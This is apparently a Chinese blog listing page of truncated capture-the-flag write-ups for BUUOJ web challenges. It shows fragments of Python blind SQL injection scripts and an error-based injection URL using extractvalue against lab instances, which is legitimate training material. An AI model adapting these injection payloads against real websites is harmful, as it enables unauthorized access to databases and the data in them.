Web
「已注销」
这个作者很懒,什么都没留下…
展开
-
buuoj [PHP]XXE
答案就在phpinfo()页面,无需通过xxe注入获得原创 2020-05-04 10:01:35 · 1271 阅读 · 1 评论 -
buuoj WUSTCTF2020颜值成绩查询
经过测试判断为盲注,编译脚本如下:import requests#database lengthdef get_database_length(): count = 0 while(1): url = "http://de626b0f-7c67-4a3f-b657-89451b2a9923.node3.buuoj.cn/?stunum=0^(length(...原创 2020-04-18 23:45:28 · 382 阅读 · 0 评论 -
buuoj BSidesCF 2019Futurella
直接看页面源码即可获得答案,简单的有点出奇。原创 2020-04-10 16:02:16 · 759 阅读 · 0 评论 -
buuoj [极客大挑战 2019]LoveSQL
报错注入:http://2c7ced76-2d5f-4690-bd62-4ca2c414de32.node3.buuoj.cn/check.php?username=admin' and extractvalue(1,concat(0x5c,(select user()))) and '1&password=67df2765f3da545f03860281ef7f964dhttp:...原创 2020-04-03 23:07:10 · 352 阅读 · 0 评论 -
buuoj [极客大挑战 2019]FinalSQL
import requests#database lengthdef get_database_length(): count = 0 while(1): url = "http://5a0d5a51-9667-4813-b173-b276246a28bc.node3.buuoj.cn/search.php?id=1^1^(length(database()...原创 2020-04-02 23:19:20 · 517 阅读 · 0 评论 -
buuoj [CISCN2019 华北赛区 Day2 Web1] Hack World
题意:All You Want Is In Table ‘flag’ and the column is ‘flag’Now, just give the id of passagefuzz一下,发现过滤了常见的关键字,包括“、select、union等。根据题意,判断存在盲注。import requestsurl = "http://2554cba6-30ef-4c0e-8231-3a...原创 2020-04-02 11:27:20 · 1026 阅读 · 3 评论